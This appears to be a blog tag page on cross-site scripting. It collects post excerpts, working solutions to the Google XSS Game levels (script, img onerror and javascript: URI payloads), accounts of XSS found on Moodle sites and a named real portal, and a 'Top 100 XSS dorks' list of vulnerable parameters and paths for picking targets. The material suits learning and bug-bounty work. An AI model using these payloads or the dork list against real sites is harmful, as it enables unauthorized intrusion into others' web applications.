Tag: xss

Unmasking the Power of Cross-Site Scripting (XSS): Types, Exploitation, Detection, and Tools

Posted on by BAx99x

In an ever-evolving digital landscape, web application security is paramount. Cross-Site Scripting, commonly known as XSS, remains one of the most prevalent and dangerous security vulnerabilities. In this blog post, we will delve into the different types of XSS, explore how it can be exploited, and learn how to detect and mitigate it, all while…

Google XSS Game

Posted on by 0xrocky

https://xss-game.appspot.com/

Level #1: Hello, world of XSS
https://xss-game.appspot.com/level1
Solution: <script>alert('xss')</script>
hint: inspect the source code of the page

Level #2: Persistence is key
https://xss-game.appspot.com/level2
Solution: <img src=x onerror=alert('XSS')>
hint: “welcome” post contains HTML

Level #3: That sinking feeling…
https://xss-game.appspot.com/level3/frame#1
Solution: https://xss-game.appspot.com/level3/frame#1' onerror='alert("xss")'>

Level #4: Context matters
https://xss-game.appspot.com/level4/frame
Solution: timer=');alert('xss

Level #5: Breaking protocol
https://xss-game.appspot.com/level5/frame
Solution: https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert('xss')

Level #6: Follow the X
https://xss-game.appspot.com/level6/frame#/static/gadget.js
Solution: https://xss-game.appspot.com/level6/frame#data:text/plain,alert('xss')

Testing for XSS (Cross Site Scripting)

Posted on by ShivanshMalik12

Hi, So today ill tell some techniques of testing XSS, First of all these important things you should note: Copy pasting XSS payloads doesn’t work PoC or GTFO Its said like report checkers need a proper PoC for validation of the report, If doesn’t, Your report cannot be triaged. So first, For testing XSS you…

Easy XSS On Mostly Educational Websites Via Moodle

Posted on by darklotuskdb

Many educational websites are using Moodle which is vulnerable to RXSS and according to shodan more than 50K websites are using this technology. Moodle is a learning platform designed to provide educators, administrators, and learners with a single robust, secure and integrated system to create personalized learning environments. This was founded by @PewGrand

How to find AngularJS XSS

Posted on by p4c3n0g3

Have you ever heard about publicwww? It’s a search engine for source code. So publicwww will fnd any alphanumeric snippet, signature or keyword in the web pages HTML, JS and CSS code. They have this list that you can search for: AdvertisingMarketingAnalyticsTechnologiesFrontendWidgetsCMS You can find it here https://publicwww.com. They also have plans and pricing if…

XSS Injection with SQLi

Posted on by _r00t1ng_

XSS Injection with SQLi (XSSQLi) XSS Injection with SQLi (XSSQLi) Well After our discussion on different types of injection and places you can find SQL injection Vulnerability, an attacker can successfully exploit and SQL injection vulnerability and get access over the database and if he is enough lucky to get access to the File System…

Using {XSS} to play games on Site

Posted on by _r00t1ng_

Hello guys, today I’m going to teach you how to play inside any website that has an XSS flaw.This technique is more aimed at making fun videos satirizing websites or even playing with your friends… The code is very simple because it only emblems the application of the game in question and an opening of…

Stored XSS on h2biz.net

Posted on by 0xrocky

I was surfing the internet when I came across this web portal http://www.h2biz.net which I found to be vulnerable to Reflected XSS. So I attempted to make a Stored XSS because I noticed a kind of message board. I have created a temporary email for registering on the website, then I completed the registration phase….

Top 100 XSS dorks

Posted on by devl00p

It’s the end of the year and a good time to share things with people.

After having scanned more than a million websites in order to find XSS and Open Redirect vulnerabilities, I took the time to do statistics on the most vulnerables parameters.

It can be used as a powerful dork list so let’s update your scanners and get bounties!

First here is the list of most vulnerable parameters along with their frequency.

Dork Frequency
q 5.5%
s 4.5%
search 1.9%
id 1.7%
lang 1.4%
keyword 1.2%
query 1.1%
page 1.0%
keywords 0.8%
year 0.8%
view 0.8%
email 0.8%
type 0.7%
name 0.7%
p 0.7%
month 0.6%
immagine 0.6%
list_type 0.5%
url 0.5%
terms 0.5%
categoryid 0.5%
key 0.5%
l 0.5%
begindate 0.4%
enddate 0.4%
categoryid2 0.4%
t 0.4%
cat 0.4%
category 0.4%
action 0.4%
bukva 0.4%
redirect_uri 0.4%
firstname 0.4%
c 0.4%
lastname 0.3%
uid 0.3%
startTime 0.3%
eventSearch 0.3%
categoryids2 0.3%
categoryids 0.3%
sort 0.3%
positiontitle 0.3%
groupid 0.3%
m 0.3%
message 0.3%
tag 0.3%
pn 0.3%
title 0.3%
orgId 0.3%
text 0.3%
handler 0.2%
myord 0.2%
myshownums 0.2%
id_site 0.2%
city 0.2%
search_query 0.2%
msg 0.2%
sortby 0.2%
produkti_po_cena 0.2%
produkti_po_ime 0.2%
mode 0.2%
CODE 0.2%
location 0.2%
v 0.2%
order 0.2%
n 0.2%
term 0.2%
start 0.2%
k 0.2%
redirect 0.2%
ref 0.2%
file 0.2%
mebel_id 0.2%
country 0.2%
from 0.1%
r 0.1%
f 0.1%
field%5B%5D 0.1%
searchScope 0.1%
state 0.1%
phone 0.1%
Itemid 0.1%
lng 0.1%
place 0.1%
bedrooms 0.1%
expand 0.1%
e 0.1%
price 0.1%
d 0.1%
path 0.1%
address 0.1%
day 0.1%
display 0.1%
a 0.1%
error 0.1%
form 0.1%
language 0.1%
mls 0.1%
kw 0.1%
u 0.1%

This second list is almost the same but with corresponding path :

Dork Frequency
/?s= 3.6
/search?q= 2.5
/index.php?lang= 0.6
/pplay/info_prenotazioni.asp?immagine= 0.6
/shared/lgflsearch.php?terms= 0.5
/index.php?page= 0.4
/search?query= 0.4
/en/Telefon-Cam?search= 0.4
/index.php?bukva= 0.4
/pro/events_print_setup.cfm?list_type= 0.3
/pro/events_print_setup.cfm?categoryid= 0.3
/pro/events_print_setup.cfm?categoryid2= 0.3
/?eventSearch= 0.3
/?startTime= 0.3
/pro/events_ical.cfm?categoryids= 0.3
/pro/events_ical.cfm?categoryids2= 0.3
/pro/events_print_setup.cfm?month= 0.3
/pro/events_print_setup.cfm?year= 0.3
/pro/events_print_setup.cfm?begindate= 0.3
/pro/events_print_setup.cfm?enddate= 0.3
/search?keyword= 0.3
/?q= 0.3
/search/?q= 0.3
/index.php?pn= 0.3
/?lang= 0.3
/property/search?uid= 0.3
/index.php?id= 0.3
/search?orgId= 0.3
/products?handler= 0.2
/pro/events_print_setup.cfm?view= 0.2
/pro/events_print_setup.cfm?keywords= 0.2
/?p= 0.2
/search.php?q= 0.2
/?search= 0.2
/pro/minicalendar_detail.cfm?list_type= 0.2
/index.php?produkti_po_cena= 0.2
/index.php?produkti_po_ime= 0.2
/servlet/com.jsbsoft.jtf.core.SG?CODE= 0.2
/login?redirect_uri= 0.2
/connexion?redirect_uri= 0.2
/index.php?action= 0.2
/plugins/actu/listing_actus-front.php?id_site= 0.2
/index.php?mebel_id= 0.2
/search/?search= 0.2
/news/class/index.php?myshownums= 0.2
/news/class/index.php?myord= 0.2
/search.html?searchScope= 0.1
/search?field%5B%5D= 0.1
/videos?tag= 0.1
/videos?place= 0.1
/videos?search= 0.1
/?email= 0.1
/?cat= 0.1
/content.php?expand= 0.1
/?page= 0.1
/search/?s= 0.1
/?keywords= 0.1
/search/?keyword= 0.1
/apps/email/index.jsp?n= 0.1
/?name= 0.1
/?sort= 0.1
/search?search= 0.1
/pro/minicalendar_print_setup.cfm?begindate= 0.1
/pro/minicalendar_print_setup.cfm?enddate= 0.1
/pro/minicalendar_print_setup.cfm?keywords= 0.1
/search-results?q= 0.1
/?listingtypeid= 0.1
/search?s= 0.1
/pro/minicalendar_print_setup.cfm?categoryid2= 0.1
/?bathrooms= 0.1
/?listingagent= 0.1
/?featuredsearchseourl= 0.1
/?squarefeet= 0.1
/?siteid= 0.1
/?bedrooms= 0.1
/?featuredsearch= 0.1
/?price= 0.1
/?maxbuilt= 0.1
/?lsid= 0.1
/?listingtypes= 0.1
/?garages= 0.1
/?maxprice= 0.1
/?minprice= 0.1
/?keywordsany= 0.1
/?yearbuilt= 0.1
/?minbuilt= 0.1
/?subdivision= 0.1
/?lotsizeval= 0.1
/?listingstatusid= 0.1
/?mls= 0.1
/firms/?text= 0.1
/servlet/com.jsbsoft.jtf.core.SG?OBJET= 0.1
/plan_du_site.php?lang= 0.1
/index.php?Itemid= 0.1
/?view= 0.1
/?t= 0.1
/?selat= 0.1
/?selong= 0.1
/?nwlat= 0.1
/?geo= 0.1

I hope you enjoy this 🙂